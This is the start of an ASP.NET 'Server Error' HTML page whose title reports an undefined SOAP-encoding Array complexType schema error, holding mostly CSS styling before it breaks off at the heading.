<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver&g